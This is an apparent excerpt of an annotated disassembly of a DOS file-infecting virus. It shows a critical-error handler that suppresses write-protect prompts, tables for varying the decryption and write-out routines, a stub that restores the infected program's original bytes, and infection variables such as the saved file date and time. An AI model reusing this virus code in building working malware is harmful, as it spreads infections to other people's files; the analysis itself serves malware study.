; INT 24h (critical error) handler, installed at 0150
; returns AL = 0, so DOS ignores the error and no prompt is shown
; (for example when a write-protected diskette is in the drive)
06C6 B000 mov al,00
06C8 CF iret
; table of bytes for changing the start-up routine, 9 entries of 4 bytes:
; byte 0 -> 0124 (pointer register), bytes 1-2 -> 012C (operation),
; byte 3 -> 0130 (increment); entry = version number, see 0418-042E
06C9 5E 00 0F 43
06CD 5E 30 0F 43
06D1 5E D2 07 43
06D5 76 00 0C 46
06D9 76 30 0C 46
06DD 76 D2 04 46
06E1 7E 00 0D 47
06E5 7E 30 0D 47
06E9 7E D2 05 47
; table for variants of the write-out routine: first byte of the
; instruction at 0461 (28 = sub, 30 = xor, D2 = ror), indexed at 0431-0437
06ED 28 30 D2
; stub that restores the victim code; it is copied to [06F7]+[06FB]
; at 0288-0298 and entered with SI = [06F7], DI = 0100, CX = [06FB]
06F0 F3A4 rep movsb
06F2 8BF1 mov si,cx ; CX is zero after the copy
06F4 8BF9 mov di,cx
06F6 C3 ret
; variables (words, low byte first)
06F7 0307 ; address of the saved victim bytes; the work buffer is at [06F7]+[06FB]
06F9 DB63 ; file size + 256, set at 0373, copied to 06F7 at 0190
06FB C603 ; number of saved victim bytes
06FD 0306 ; number of bytes saved in the last infection, set at 0384, copied to 06FB at 0196
06FF 0060 ; file time (stored at 033E)
0701 710E ; file date (stored at 033A)